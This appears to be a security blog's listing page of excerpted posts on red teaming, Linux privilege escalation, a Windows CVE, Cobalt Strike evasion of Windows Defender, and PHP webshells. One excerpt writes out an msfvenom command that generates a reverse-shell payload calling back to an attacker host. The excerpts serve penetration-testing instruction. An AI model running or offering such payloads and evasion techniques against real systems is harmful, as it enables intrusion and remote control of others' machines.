摘要: 第1章 红队和红队概述 贡献者:Tony Kelly @infosectdk # 翻译者 BugMan 什么是红队?它来自哪里? 红队的起源是军事起源。人们意识到,为了更好地防御, 需要攻击自己的防御系统以发现薄弱点,然后可以更好地防御.演变成“战争游戏”,其中后卫或友军标为蓝色, 敌军是红色的。R 阅读全文
posted @ 2020-02-22 18:33 BugMan_Sec 阅读(1702) 评论(0) 推荐(0) 编辑
摘要: 这里是Linux环境中特权升级的最常用技术: 内核 突破 以root身份运行的程序 安装的软件 弱密码 /重用密码 /纯文本密码 内部服务 Suid 配置错误 滥用sudo权利 由root调用的世界可写脚本 路径配置错误 Cronjobs 卸载的文件系统 内核利用 脏牛利用 此漏洞最初是通过HTTP 阅读全文
posted @ 2020-02-21 23:43 BugMan_Sec 阅读(660) 评论(0) 推荐(0) 编辑
摘要: MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Wind 阅读全文
posted @ 2020-02-21 20:28 BugMan_Sec 阅读(594) 评论(0) 推荐(1) 编辑
摘要: Axer-使用Msfvenom自动创建有效负载的工具 该axer将替换为有效的手动操作msfvenom,设置更容易和快了很多。 AXER可以让您选择平台,格式,编码器,与另一个文件绑定以及许多其他功能: 下载The-Axer https://github.com/ceh-tn/The-Axer 阅读全文
posted @ 2020-02-21 20:19 BugMan_Sec 阅读(208) 评论(0) 推荐(0) 编辑
摘要: CVE-2020-0668-Windows服务跟踪中的普通特权升级错误 在这里中,我将讨论在Windows Service跟踪中发现的任意文件移动漏洞。从我的测试来看,它影响了从Vista到10的所有Windows版本,但它可能更旧,因为XP中已经存在此功能。 服务跟踪是一项旧功能,我可以转换到Wi 阅读全文
posted @ 2020-02-21 18:17 BugMan_Sec 阅读(424) 评论(0) 推荐(0) 编辑
摘要: Cobalt Strike – Bypassing Windows Defender 混淆处理 对于所有红色团队成员来说,在交付有效的替代品同时又不拖延延展组织的所有风吹草动始终是一个挑战。就像所有其他安全解决方案一样,Windows Defender在检测由Cobalt Strike等工具生成的通 阅读全文
posted @ 2020-02-21 14:56 BugMan_Sec 阅读(855) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-02-21 14:22 BugMan_Sec 阅读(8) 评论(0) 推荐(0) 编辑
摘要: 隐藏Webshell 阅读全文
posted @ 2020-02-20 18:11 BugMan_Sec 阅读(178) 评论(0) 推荐(0) 编辑
摘要: 404 not found Webshell 克隆或下载项目: 安装 src/404.php文件应位于目标服务器上。 该服务器必须具有执行.php文件的能力。 这是服务器所在的一些最常见路由的示例: Windows (Xampp) Linux 现在,您可以通过浏览器访问它: 您可以替换服务器404错 阅读全文
posted @ 2020-02-20 18:07 BugMan_Sec 阅读(288) 评论(0) 推荐(0) 编辑
摘要: 渗透测试流程 ======================== From: 《Metasploit 渗透测试魔鬼训练营》 1.1.4 渗透测试过程环节 PTES 渗透测试执行标准是由安全业界多家领军企业技术专家所共同发起的,期望为企 业组织与安全服务提供商设计并制定用来实施渗透测试的通用描述准则。P 阅读全文
posted @ 2020-02-20 16:56 BugMan_Sec 阅读(317) 评论(0) 推荐(0) 编辑